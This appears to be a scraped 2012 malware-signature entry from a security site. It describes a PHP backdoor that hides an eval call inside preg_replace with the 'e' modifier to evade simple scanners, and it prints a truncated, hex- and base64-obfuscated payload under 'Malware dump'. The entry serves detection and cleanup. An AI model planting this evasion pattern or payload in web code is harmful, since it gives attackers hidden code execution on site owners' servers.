Backdoor: PHP:PREG_REPLACE:EVAL

Description: We detected a malicious code hidden under a preg_replace with the “e” switch that acts as an eval call (code execution). It is often used to bypass simple detection methods that only look for “eval(” call itself.

Use: Hide spam, malware and backdoors.

Affecting: Any web site (often through outdated WordPress, Joomla, vBulletin, osCommerce and stolen passwords).

Clean up: You can also sign up with us and let our team remove the malware for you.

Malware dump:
preg_replace(“/.*/e”,”\x65\x76\x61\x6C\x28\x67\x7A\x69…2LKjE1nyJHlOmua7X4AiRdpW2t2/bmtJFEDiB4IACCrx1Og8mS7TcRln6Si6jYuy6LRnWTZLona3a9wbkmlUxM5O3L3fCYMXeR7edVpFOI1G82wStXqtbBGlo6uwiCZxDq81axSn42QJz016dBuNBXESF+FVEo0kWgG0MEmy…</p> <p>

More information: Backdoor: PHP:PREG_REPLACE:EVAL

Story added 11. March 2012, content source with full text you can find at link above.

Backdoor: PHP:PREG_REPLACE:EVAL

More antivirus and malware news?

Ads

Security news

Malware

Security

IT security

About site

Search Terms Tips

Recent New Tips

Recent Posts